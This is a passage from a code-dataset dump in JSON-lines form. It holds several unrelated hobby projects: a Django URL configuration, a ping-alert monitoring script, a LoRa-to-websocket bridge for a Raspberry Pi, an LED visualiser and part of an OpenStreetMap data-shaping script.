"attribute"}, {"api_name": "os.path.join", "line_number": 1142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1142, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1143, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 1144, "usage_type": "call"}, {"api_name": "astropy.io.ascii.read", "line_number": 1147, "usage_type": "call"}, {"api_name": "astropy.io", "line_number": 1147, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 1167, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 1173, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 1177, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 1181, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 1192, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1192, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1192, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 1194, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 1194, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 1194, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 1194, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 1195, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 1199, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 1212, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1213, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1213, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 1214, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1214, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 1215, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 1216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1216, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 1217, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 1220, "usage_type": "name"}, {"api_name": "logging.INFO", "line_number": 1259, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 1319, "usage_type": "name"}]} +{"seq_id": "12236293187", "text": "\"\"\"guest URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, re_path, include\n# 导入 sign 应用 views 文件\nfrom sign import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('index/', views.index), # 添加index/ 路径配置\n path('login_action/', views.login_action), # 指定表单提交的路径\n path('event_manage/', views.event_manage), # 发布会管理页面\n path('accounts/login/', views.index), # 登录\n path('search_name/', views.search_name), # 发布会名称搜索\n path('search_phone/', views.search_phone), # 嘉宾手机号搜索\n path('guest_manage/', views.guest_manage), # 嘉宾\n re_path('sign_index/(?P<eid>[0-9]+)/', views.sign_index), # 签到\n re_path('sign_index_action/(?P<eid>[0-9]+)/', views.sign_index_action),\n path('logout/', views.logout), # 退出\n path('api/', include('sign.urls', namespace=\"sign\")), # 接口根路径\n]\n", "repo_name": "chenzy01/guest", "sub_path": "guest/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1555, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "sign.views.index", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "sign.views.login_action", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 24, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "sign.views.event_manage", "line_number": 25, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 25, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "sign.views.index", "line_number": 26, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 26, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "sign.views.search_name", "line_number": 27, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 27, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "sign.views.search_phone", "line_number": 28, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 28, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "sign.views.guest_manage", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 29, "usage_type": "name"}, {"api_name": "django.urls.re_path", "line_number": 30, "usage_type": "call"}, {"api_name": "sign.views.sign_index", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 30, "usage_type": "name"}, {"api_name": "django.urls.re_path", "line_number": 31, "usage_type": "call"}, {"api_name": "sign.views.sign_index_action", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "sign.views.logout", "line_number": 32, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "73923844124", "text": "#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport os,time,csv\nfrom multiprocessing.dummy import Pool as ThreadPool\n\n'''\n config files : ip.list , black.list , exclude\n'''\n\nHOSTS = {}\nBLACKLIST = {}\nINTERVAL = '0.1'\nCOUNT = '10'\nPATH = '/nms/bin/'\nNOW = time.strftime('%Y/%m/%d-%H:%M',time.localtime(time.time()))\n\ndef sping(ip):\n\t\"\"\" do ping ,return a tuple \"\"\"\n\tglobal INTERVAL\n\tglobal COUNT\n\n\tdata = os.popen('ping '+ip+' -c '+COUNT+' -i '+INTERVAL).read()\n\tloss = data.split('%')[0].split(' ')[-1]\n\ttry:\n\t\trtt = data.split('min/avg/max/mdev =')[1].split()[0]\n\t\tmin, avg, max, mdev = rtt.split('/')\n\texcept:\n\t\tmin = avg = max = mdev = '0'\n\treturn (ip,loss,min,avg,max,mdev)\n\ndef globalVar(PATH):\n\t\"\"\" create {ip:hostname} and blacklist \"\"\"\n\tglobal HOSTS\n\tglobal BLACKLIST\n\n\tipfile = PATH.rstrip('/') + '/ip.list'\n\tblack = PATH.rstrip('/') + '/black.list'\n\texclude = PATH.rstrip('/') + '/exclude'\n\n\twith open(ipfile,'r') as data:\n\t\tfor i in data:\n\t\t\tip,name = i.split(',')\n\t\t\tHOSTS[ip.strip()]=name.strip()\n\ttry:\n\t\tblacklist = open(black,'r')\n\texcept:\n\t\tos.mknod(black)\n\t\tblacklist = open(black,'r')\n\tBLACKLIST = [i.split()[0].strip() for i in blacklist]\n\n\ttry:\n\t\texcludes = open(exclude,'r')\n\texcept:\n\t\tos.mknod(exclude)\n\t\texcludes = open(exclude,'r')\n\tfor i in excludes:\n\t\tBLACKLIST.append(i.strip())\n\ndef alert(msg, warn, type='both'):\n\t\"\"\" msg is (ip,loss,min,avg,max,mdev), from sping() \"\"\"\n\n\tip,loss,min,avg,max,mdev = msg\n\tnms = os.uname()[1]\n\ttpl = '%s:%s [%s] %s | %s%% | %sms' %(nms.strip().upper(),NOW,HOSTS[ip].strip().upper(),ip,loss,avg)\n\tlog = 'time=%s, ip=%s, loss=%s, min=%s, avg=%s, max=%s, mdev=%s' % (NOW,ip,loss,min,avg,max,mdev)\n\tlogging(log)\t\t\n\tif float(loss) > float(warn) and ip not in BLACKLIST:\n\t\tif type == 'mail':\n\t\t\tos.popen('echo \"'+tpl+'\" | /nms/bin/syslog-sendmail.sh')\n\t\telif type == 'sms':\n\t\t\tos.popen('echo \"'+tpl+'\" | /nms/bin/syslog-sendsms.sh')\n\t\telse:\n\t\t\tos.popen('echo \"'+tpl+'\" | /nms/bin/syslog-sendmail.sh')\n\t\t\tos.popen('echo \"'+tpl+'\" | /nms/bin/syslog-sendsms.sh')\n\t\twrBlacklist(ip,PATH)\n\treturn tpl\n\ndef logging(log):\n\tfilename = time.strftime('%Y%m%d-%H%M',time.localtime(time.time()))\n\tpname = time.strftime('%Y%m%d',time.localtime(time.time()))\n\tlogpath = '/nms/log/sping/'+pname+'/'\n\tif os.path.exists(logpath):\n\t\tpass\n\telse:\n\t\tos.makedirs(logpath)\n\tos.system('echo \"'+log+'\" >> '+logpath+filename)\n\ndef wrBlacklist(ip):\n\tos.system('echo '+ip+' auto >> '+PATH.rstrip('/') + '/black.list')\n\ndef multiTask(count,list):\n\t\n\twarn = '30'\n\taccess_warn = '70' \n\tnon_warn = '200'\n\n\tpool = ThreadPool(int(count))\n\tdatalist = pool.map(sping, list)\n\n\tfor data in datalist:\n \tif HOSTS[ip].startswith('A_'):#ip.list column 2 starts with A_ is access switch\n \talert(data, access_warn)\n \telif HOSTS[ip].startswith('NO_'):#ip.list column 2 starts with NO_ didn't alarm\n \talert(data, non_warn)\n \telse:\n \talert(data, warn)\n\tpool.close()\n\tpool.join()\n\n\nif __name__ == '__main__':\n\tips = []\n\tglobalVar(PATH) #create a dict {ip,hostname} and a blacklist\n\tfor ip in HOSTS:\n\t\tips.append(ip)\n\n\tmultiTask(20,ips)\n\n\tif NOW.endswith('0'):\n\t\tos.system('cat /dev/null > '+PATH.rstrip('/')+'/black.list')\n", "repo_name": "gothack329/sirius.py", "sub_path": "s-ping-alert.py", "file_name": "s-ping-alert.py", "file_ext": "py", "file_size_in_byte": 3197, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "time.strftime", "line_number": 16, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 16, "usage_type": "call"}, {"api_name": "time.time", "line_number": 16, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 23, "usage_type": "call"}, {"api_name": "os.mknod", "line_number": 48, "usage_type": "call"}, {"api_name": "os.mknod", "line_number": 55, "usage_type": "call"}, {"api_name": "os.uname", "line_number": 64, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 70, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 72, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 74, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 75, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 80, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 80, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 81, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 81, "usage_type": "call"}, {"api_name": "time.time", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 86, "usage_type": "call"}, {"api_name": "os.system", "line_number": 87, "usage_type": "call"}, {"api_name": "os.system", "line_number": 90, "usage_type": "call"}, {"api_name": "multiprocessing.dummy.Pool", "line_number": 98, "usage_type": "call"}, {"api_name": "os.system", "line_number": 121, "usage_type": "call"}]} +{"seq_id": "13800087025", "text": "#!/usr/bin/env python3\nimport os\nimport errno\nimport time\nfrom threading import Thread\nimport json\nimport string\nimport serial\nimport RPi.GPIO as GPIO\nimport websocket\ntry:\n import thread\nexcept ImportError:\n import _thread as thread\n \n#OnlineDB.NET API KEY \n\nOnlineDBKEY = '<YOUR_API_KEY>'\n\n\n#input pipe\n#you can send JSON messages to arduino nodes by writing commands in pipe\n#\n# For instance:\n# echo -n \"{\\\"a\\\":\\\"report\\\",\\\"d\\\":\\\"all\\\",\\\"w\\\":1}\" > /tmp/loraflow\n# w - wake up\n\nFIFO = '/tmp/loraflow'\n\n\n\nser = serial.Serial(\n port='/dev/ttyS0', #might be port='/dev/ttyAMA0' as well\n #port='/dev/ttyAMA0',\n baudrate = 9600,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1\n)\n\n\n#RPi pins\nM0 = 17\nM1 = 27\n\n\n# global variables\npipeMsg = \"\";\n\n\n\ndef set_lora_module_normal_mode():\n GPIO.setmode(GPIO.BCM)\n #set lora module to normal mode\n GPIO.setup(M0,GPIO.OUT)\n GPIO.setup(M1,GPIO.OUT)\n\n GPIO.output(M0,GPIO.LOW)\n GPIO.output(M1,GPIO.LOW)\n \n \ndef set_lora_module_to_wake_up_other():\n GPIO.setmode(GPIO.BCM)\n #add wakeup packet, because arduino lora module is sleeping\n GPIO.setup(M0,GPIO.OUT)\n GPIO.setup(M1,GPIO.OUT)\n\n GPIO.output(M0,GPIO.HIGH)\n GPIO.output(M1,GPIO.LOW)\n\n #send whitespaces to wake up node\n ser.write(\" \".encode('ascii'));\n ser.flush()\n\ndef pipe_thread(threadname):\n global pipeMsg\n try:\n os.mkfifo(FIFO, 0o777)\n except OSError as oe:\n if oe.errno != errno.EEXIST:\n raise\n\n os.chmod(FIFO,0o777)\n\n while True:\n with open(FIFO) as fifo:\n while True:\n data = fifo.read()\n if len(data) == 0:\n break\n pipeMsg = data\n \n\ndef send_lora_msg( msg ):\n print(msg)\n \n\ndef clean_string( strg ): \n newstrg = \"\"\n acc = \"\"\" '\",{}[].`;:_-<> \"\"\"\n for x in strg:\n if x in string.ascii_letters or x in string.digits or x in acc:\n newstrg += x\n return newstrg\n\n \n\ndef serial_thread(threadname):\n global pipeMsg\n global lastValidSerialMsg\n global ws\n \n while True:\n \n #SERIAL READ\n \n data = ser.readline()\n serialMsg = data.decode('ascii','ignore')\n \n if serialMsg != \"\" :\n \n print('Got lora msg: \"{0}\"'.format(serialMsg))\n \n serialMsg = clean_string(serialMsg)\n #ensure that we have json with double quotes\n serialMsg = serialMsg.replace('\\'','\\\"')\n\n try:\n jsonData = json.loads(serialMsg)\n lastValidSerialMsg = json.dumps(jsonData);\n try:\n print('Sending lora msg to socket \"{0}\"'.format(json.dumps(jsonData)))\n ws.send(lastValidSerialMsg)\n except Exception as ex:\n print(\"looks like websocket is down\")\n \n except ValueError:\n print('Decoding JSON has failed')\n \n \n #SERIAL WRITE\n \n if pipeMsg != \"\" :\n print('Recieved message from pipe: \"{0}\"'.format(pipeMsg))\n \n #check if json has wake up flag -> \"w\":1\n #we should remove it before passing to lora node as it is not neccessary for node\n try:\n jsonData = json.loads(pipeMsg)\n if (\"w\" in jsonData) and (jsonData[\"w\"] == 1) :\n print(\"Setting wake-up mode\");\n set_lora_module_to_wake_up_other()\n jsonData.pop('w', None) #remove w field\n except ValueError:\n print('Decoding JSON has failed')\n \n \n msgToSend = str(jsonData)\n \n print('Going to send message to lora module: \"{0}\"'.format(msgToSend))\n \n ser.write(msgToSend.encode('ascii'))\n \n ser.flush()\n set_lora_module_normal_mode()\n pipeMsg = \"\"\n \n time.sleep(0.1)\n \n \n#SOCKET RELATED\n\ndef on_message(ws, message):\n global pipeMsg\n global lastValidSerialMsg\n if message != lastValidSerialMsg :\n pipeMsg = message\n \n\ndef on_error(ws, error):\n print(error)\n\ndef on_close(ws):\n print(\"### ws closed ###\")\n\ndef on_open(ws):\n print(\"### ws opened ###\")\n\n\ndef websocket_thread(threadname):\n global ws\n while 1:\n ws = websocket.WebSocketApp(\"ws://www.onlinedb.net/\" + str(OnlineDBKEY) + \"/socket/\",\n on_message = on_message,\n on_error = on_error,\n on_close = on_close)\n ws.on_open = on_open\n ws.run_forever()\n time.sleep(10)\n print(\"Reconnecting to websocket...\");\n\n\n\nthread1 = Thread( target=pipe_thread, args=(\"Pipe Thread\", ) )\nthread1.start()\n\nthread2 = Thread( target=serial_thread, args=(\"Serial Thread\", ) )\nthread2.start()\n\nthread3 = Thread( target=websocket_thread, args=(\"WebSocket Thread\", ) )\nthread3.start()\n\nthread1.join()\nthread2.join()\nthread3.join()\n\n", "repo_name": "loraflow-net/loraflow", "sub_path": "loraflow.py", "file_name": "loraflow.py", "file_ext": "py", "file_size_in_byte": 5271, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "86", "api": [{"api_name": "serial.Serial", "line_number": 32, "usage_type": "call"}, {"api_name": "serial.PARITY_NONE", "line_number": 36, "usage_type": "attribute"}, {"api_name": "serial.STOPBITS_ONE", "line_number": 37, "usage_type": "attribute"}, {"api_name": "serial.EIGHTBITS", "line_number": 38, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setmode", "line_number": 54, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 54, "usage_type": "name"}, {"api_name": "RPi.GPIO.BCM", "line_number": 54, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 56, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 56, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 56, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 57, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 57, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 57, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 59, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 59, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 59, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 60, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 60, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 60, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setmode", "line_number": 64, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 64, "usage_type": "name"}, {"api_name": "RPi.GPIO.BCM", "line_number": 64, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 66, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 66, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 66, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 67, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 67, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 67, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 69, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 69, "usage_type": "name"}, {"api_name": "RPi.GPIO.HIGH", "line_number": 69, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 70, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 70, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.mkfifo", "line_number": 79, "usage_type": "call"}, {"api_name": "errno.EEXIST", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.chmod", "line_number": 84, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 103, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 103, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 130, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 131, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 133, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 150, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 169, "usage_type": "call"}, {"api_name": "websocket.WebSocketApp", "line_number": 194, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 200, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 205, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 208, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 211, "usage_type": "call"}]} +{"seq_id": "23408140196", "text": "import ImageGrab\nimport serial\nimport sys\nimport pyaudio\nimport time\nimport wave\nimport audioop\n\nr_sum = 0\ng_sum = 0\nb_sum = 0\n\nser = serial.Serial('COM5')\np = pyaudio.PyAudio()\n\n#\"Stereo Mix\" must be enabled in windows settings. input_device_index = the Stereo Mix index\n#format,rate, etc. are dependent on sound card and desired settings\nstream = p.open(format=pyaudio.paInt16, channels=2, rate=30000,\n\t\tinput=True, frames_per_buffer=2048, input_device_index=1)\n\nwhile True:\n\n\t'''RGB'''\n\t#grab screen and get bounding box\n\timage = ImageGrab.grab()\n\tpixels = image.load()\n\tbbox = image.getbbox()\n\t#iterate over pixels in screen\n\tfor y in range(0, bbox[3]-10, 10):\n\t\tfor x in range(0, bbox[2]-10, 10):\n\t\t\t#sum rgb values\n\t\t\tr_sum = r_sum + pixels[x,y][0]\n\t\t\tg_sum = g_sum + pixels[x,y][1]\n\t\t\tb_sum = b_sum + pixels[x,y][2]\n\t\n\t'''AUDIO'''\n\t#get 2048 frames and calculate \"RMS\" (a measure of volume)\n\tdata = stream.read(2048)\n\tvol = audioop.rms(data, 2)\n\t#map RMS volume values to (0,255) brightness level for LEDs\n\tvol_mapped = (int)((float(vol) / float(3000)) * 255)\n\tif vol_mapped > 255:\n\t\tvol_mapped = 255\n\t\t\n\t'''SERIAL'''\n\t#send data to serial as bytes (chars)\n\tser.write('R') # start byte\n\t#averages for r, g, and b, then audio volume\n\tser.write(chr(r_sum / (bbox[2]*bbox[3]/10)))\n\tser.write(chr(g_sum / (bbox[2]*bbox[3]/10)))\n\tser.write(chr(b_sum / (bbox[2]*bbox[3]/10)))\n\tser.write(chr(vol_mapped))\n\n\t#reset sums\n\tr_sum = 0\n\tg_sum = 0\n\tb_sum = 0\n\ttime.sleep(.01)\n", "repo_name": "amkram/led-visualizer-thing", "sub_path": "py/rgb.py", "file_name": "rgb.py", "file_ext": "py", "file_size_in_byte": 1469, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "serial.Serial", "line_number": 13, "usage_type": "call"}, {"api_name": "pyaudio.PyAudio", "line_number": 14, "usage_type": "call"}, {"api_name": "pyaudio.paInt16", "line_number": 18, "usage_type": "attribute"}, {"api_name": "ImageGrab.grab", "line_number": 25, "usage_type": "call"}, {"api_name": "audioop.rms", "line_number": 39, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "27154629689", "text": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n\r\nNote: This code was provided by Udacity during Quiz #11 of the \"Case Study\"\r\nin the \"Data Wrangling\" course, expect for calls to clean the data\r\n\r\nThe code reads the Open Street Map data file nodes, ways, and relations and\r\nis transformed into a dictionary of dictionary.\r\n\r\nThe process for this transformation is as follows:\r\n- Use iterparse to iteratively step through each top level element in the XML\r\n- Shape each element into several data structures using a custom function\r\n- Utilize a schema and validation library to ensure the transformed data is in the correct format\r\n- Write each data structure to the appropriate .csv files\r\n\r\n\r\nWe've already provided the code needed to load the data, perform iterative parsing and write the\r\noutput to csv files. Your task is to complete the shape_element function that will transform each\r\nelement into the correct format. To make this process easier we've already defined a schema (see\r\nthe schema.py file in the last code tab) for the .csv files and the eventual tables. Using the\r\ncerberus library we can validate the output against this schema to ensure it is correct.\r\n\r\n### If the element top level tag is \"node\":\r\n\r\nThe dictionary returned should have the format {\"node\": .., \"node_tags\": ...}\r\n\r\nThe \"node\" field should hold a dictionary of the following top level node attributes:\r\n- id\r\n- user\r\n- uid\r\n- version\r\n- lat\r\n- lon\r\n- timestamp\r\n- changeset\r\n\r\nAll other attributes can be ignored\r\n\r\nThe \"node_tags\" field should hold a list of dictionaries, one per secondary tag. Secondary tags are\r\nchild tags of node which have the tag name/type: \"tag\". Each dictionary should have the following\r\nfields from the secondary tag attributes:\r\n\r\n- id: the top level node id attribute value\r\n- key: the full tag \"k\" attribute value if no colon is present or the characters after the colon if one is.\r\n- value: the tag \"v\" attribute value\r\n- type: either the characters before the colon in the tag \"k\" value or \"regular\" if a colon is not present.\r\n\r\nAdditionally,\r\n\r\n- if the tag \"k\" value contains problematic characters, the tag should be ignored\r\n- if the tag \"k\" value contains a \":\" the characters before the \":\" should be set as the tag type\r\n and characters after the \":\" should be set as the tag key\r\n- if there are additional \":\" in the \"k\" value they and they should be ignored and kept as part of\r\n the tag key. For example:\r\n\r\n <tag k=\"addr:street:name\" v=\"Lincoln\"/>\r\n should be turned into\r\n {'id': 12345, 'key': 'street:name', 'value': 'Lincoln', 'type': 'addr'}\r\n\r\n- If a node has no secondary tags then the \"node_tags\" field should just contain an empty list.\r\n\r\nThe final return value for a \"node\" element should look something like:\r\n\r\n{'node': {'id': 757860928,\r\n 'user': 'uboot',\r\n 'uid': 26299,\r\n 'version': '2',\r\n 'lat': 41.9747374,\r\n 'lon': -87.6920102,\r\n 'timestamp': '2010-07-22T16:16:51Z',\r\n 'changeset': 5288876},\r\n 'node_tags': [{'id': 757860928,\r\n 'key': 'amenity',\r\n 'value': 'fast_food',\r\n 'type': 'regular'},\r\n {'id': 757860928,\r\n 'key': 'cuisine',\r\n 'value': 'sausage',\r\n 'type': 'regular'},\r\n {'id': 757860928,\r\n 'key': 'name',\r\n 'value': \"Shelly's Tasty Freeze\",\r\n 'type': 'regular'}]}\r\n\r\n### If the element top level tag is \"way\":\r\n\r\nThe dictionary should have the format {\"way\": ..., \"way_tags\": ..., \"way_nodes\": ...}\r\n\r\nThe \"way\" field should hold a dictionary of the following top level way attributes:\r\n- id\r\n- user\r\n- uid\r\n- version\r\n- timestamp\r\n- changeset\r\n\r\nAll other attributes can be ignored\r\n\r\nThe \"way_tags\" field should again hold a list of dictionaries, following the exact same rules as for \"node_tags\".\r\n\r\nAdditionally, the dictionary should have a field \"way_nodes\". \"way_nodes\" should hold a list of\r\ndictionaries, one for each nd child tag. Each dictionary should have the fields:\r\n- id: the top level element (way) id\r\n- node_id: the ref attribute value of the nd tag\r\n- position: the index starting at 0 of the nd tag i.e. what order the nd tag appears within the way element\r\n\r\nThe final return value for a \"way\" element should look something like:\r\n\r\n{'way': {'id': 209809850,\r\n 'user': 'chicago-buildings',\r\n 'uid': 674454,\r\n 'version': '1',\r\n 'timestamp': '2013-03-13T15:58:04Z',\r\n 'changeset': 15353317},\r\n 'way_nodes': [{'id': 209809850, 'node_id': 2199822281, 'position': 0},\r\n {'id': 209809850, 'node_id': 2199822390, 'position': 1},\r\n {'id': 209809850, 'node_id': 2199822392, 'position': 2},\r\n {'id': 209809850, 'node_id': 2199822369, 'position': 3},\r\n {'id': 209809850, 'node_id': 2199822370, 'position': 4},\r\n {'id': 209809850, 'node_id': 2199822284, 'position': 5},\r\n {'id': 209809850, 'node_id': 2199822281, 'position': 6}],\r\n 'way_tags': [{'id': 209809850,\r\n 'key': 'housenumber',\r\n 'type': 'addr',\r\n 'value': '1412'},\r\n {'id': 209809850,\r\n 'key': 'street',\r\n 'type': 'addr',\r\n 'value': 'West Lexington St.'},\r\n {'id': 209809850,\r\n 'key': 'street:name',\r\n 'type': 'addr',\r\n 'value': 'Lexington'},\r\n {'id': '209809850',\r\n 'key': 'street:prefix',\r\n 'type': 'addr',\r\n 'value': 'West'},\r\n {'id': 209809850,\r\n 'key': 'street:type',\r\n 'type': 'addr',\r\n 'value': 'Street'},\r\n {'id': 209809850,\r\n 'key': 'building',\r\n 'type': 'regular',\r\n 'value': 'yes'},\r\n {'id': 209809850,\r\n 'key': 'levels',\r\n 'type': 'building',\r\n 'value': '1'},\r\n {'id': 209809850,\r\n 'key': 'building_id',\r\n 'type': 'chicago',\r\n 'value': '366409'}]}\r\n\"\"\"\r\n\r\nimport csv\r\nimport codecs\r\nimport re\r\nimport xml.etree.cElementTree as ET\r\n\r\nfrom open_street_clean import clean_tags\r\n\r\n# Regular expressions\r\nLOWER_COLON = re.compile(r'^([a-z]|_)+:([a-z]|_)+')\r\nPROBLEMCHARS = re.compile(r'[=\\+/&<>;\\'\"\\?%#$@\\,\\. \\t\\r\\n]')\r\n\r\n# Make sure the fields order in the csvs matches the column order in the sql table schema\r\nNODE_FIELDS = ['id', 'lat', 'lon', 'user', 'uid', 'version', 'changeset', 'timestamp']\r\nNODE_TAGS_FIELDS = ['id', 'key', 'value', 'type']\r\nWAY_FIELDS = ['id', 'user', 'uid', 'version', 'changeset', 'timestamp']\r\nWAY_TAGS_FIELDS = ['id', 'key', 'value', 'type']\r\nWAY_NODES_FIELDS = ['id', 'node_id', 'position']\r\n\r\n\r\ndef shape_node(element, node_attr_fields=NODE_FIELDS, problem_chars=PROBLEMCHARS,\r\n default_tag_type ='regular'):\r\n \"\"\"\r\n Clean and shape node elements\r\n element = OSM XML element\r\n node_attr_fields = list of expected node attributes\r\n problem_chars = regular expression for keys we should ignore\r\n default_tag_type = indicate the type for a default 